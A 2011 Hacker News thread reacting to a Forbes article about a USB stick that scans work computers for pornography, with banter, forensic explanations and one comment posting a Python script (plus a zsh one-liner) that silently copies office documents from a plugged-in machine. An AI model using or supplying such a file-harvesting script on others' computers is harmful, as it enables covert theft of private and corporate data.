
The $100 USB Stick Your Boss Can Use To Find Your Porn - solipsist
http://blogs.forbes.com/marcwebertobias/2011/04/07/the-100-usb-stick-your-boss-can-use-to-find-your-porn/
======
peteforde
I can add "thought police is okay, pornography is a menace" to my long list of
reasons not to click on Forbes articles.

Frankly, I'm proud to run a workplace where I officially don't give a damn
what people keep on their computers. I pay them for results, not control of
their erotic minds. If someone is horny, they should go rub one out. Then get
back to work calmer and better able to concentrate.

Just don't forget to wash your hands.

~~~
kovar
So you're OK with your employees using corporate resources for child
pornography?

Edit: I do computer forensics and ediscovery for a living. I'm not trolling.
That was just one of many things that you really don't want your employees
storing on your computers if you don't want someone like me, or worse, the LE
version of me, showing up at your site.

~~~
wlievens
"I don't give a damn what people keep on their computers" in no way implies
"I'm fine with them breaking the law". You're trolling.

~~~
kovar
No, I was determining the limits, pointing out that he does care, and that
there are many things he would object to finding on those computers.

Churchill: Madam, would you sleep with me for five million pounds? Woman: My
goodness, Mr. Churchill… Well, I suppose… we would have to discuss terms, of
course… Churchill: Would you sleep with me for five pounds? Woman: Mr.
Churchill, what kind of woman do you think I am?! Churchill: Madam, we’ve
already established that. Now we are haggling about the price.

------
gscott
It would be great to walk up to any computer, plug in a usb stick, have it
automatically copy the porn so I could review it later at my leisure.

------
woodall

         #!/usr/bin/python
    
         import os,shutil
         exts = [".txt",".doc",".docx",".xls",".xlsx",".ppt",".pptx"]
         
    
         startpath = os.environ['HOMEDRIVE']
         
         
         def find(none, directory, filenames):                      
             for file in filenames:                                      
                 for ext in exts:                      
                     if file.endswith(ext):                
                         fullfile = os.path.join(directory,file)
                         try:
                             shutil.copy(fullfile,file)
                         except IOError:
                             pass # access denied
         os.path.walk(startpath,find, None)
    

This was on the Hak5 forums when the U3 drives were popular. It can be used to
search for file extensions and copy the ones that match those specified. It is
easily fooled, but you could add the ability to look for headers in binary
data, thread it, ect. R.I.P unpersons.org

~~~
michaelcampbell
I'm not seeing where it copies the file TO, but assuming you have a dump
directory /dump, is that the same, more or less, as:

    
    
        zsh -c 'cp $HOMEDRIVE/**/*.{txt,{doc,xls,ppt}{,x}} /dump'
    
    
    ?

------
vacri
"porn detection stick"? Most men already have one of those.

------
BasDirks
I need one of these to recover my own porn!

------
drivebyacct2
I'd love a copy of the software. I'd be interested to see if it works in
Linux, and if so, what it can find and particularly what it would find on my
system.

If you were in Linux and were looking at porn and wanted to check all of the
places you could think of off the top of your head... what sort of places
would you look for thumbnails, caches, etc. Kinda curious about this now...

~~~
pipeline_tux
There are two common approaches that forensics tools use: 1) It could be
scanning the file system and looking for all files (both present on the drive
and deleted), which have an image extension on the filename (.jpg, .gif, etc).
The advantage of this approach is speed. 2) It could be going through looking
at the raw data on the hard drive, and search byte-by-byte for the magic
headers at the start of every image file. For example all GIF files start with
GIF87a or GIF89a. This approach takes much longer, but would find all files
(possibly even ones deleted years ago, well before the current OS install),
and works irrespective of which operating systems are installed.

Given the screenshot, I'm guessing it takes the first approach.

EDIT: There are open source tools for Linux which take the second approach...
Probably the best is called Foremost.

~~~
michaelcampbell
I may have misread, but wasn't the "clever bit" the part that tried to detect
if an image was pornographic? (As opposed to just being an image.)

I suppose it could look for fleshtone colors or something; perhaps over a
certain % of total, or if the fleshtoned pixels are "bunched up" in certain
blobs of areas or something.

~~~
pipeline_tux
Yep, that's pretty much how they work. I can't find the details of it now, but
the "smart" ones also do some colour transformations on the image so detection
will work irrespective of what race the people in the porn are.

------
anulman
So... a USB stick that can find pornographic _images_. On your _hard drive_.

(On the surface level, I can appreciate the technical hurdles required to get
here. I just find it hard to believe that this could flag anyone even mildly
computer-savvy.)

~~~
peteforde
The article clearly states that the device searches several media types (CDs,
DVDs, USB drives, even flash cards) and looks at file signatures instead of
file extensions so things can't be hidden.

You didn't read the article very well.

~~~
anulman
Sorry I wasn't clear enough – I was trying to imply that sites like YouPorn,
with an Alexa rank of 75 (source: <http://en.wikipedia.org/wiki/YouPorn>),
eliminate the need for local storage (save the cache, thanks pipeline_tux).

Further, the article never said anything about video, which I would imagine
has only grown in popularity over the past decade.

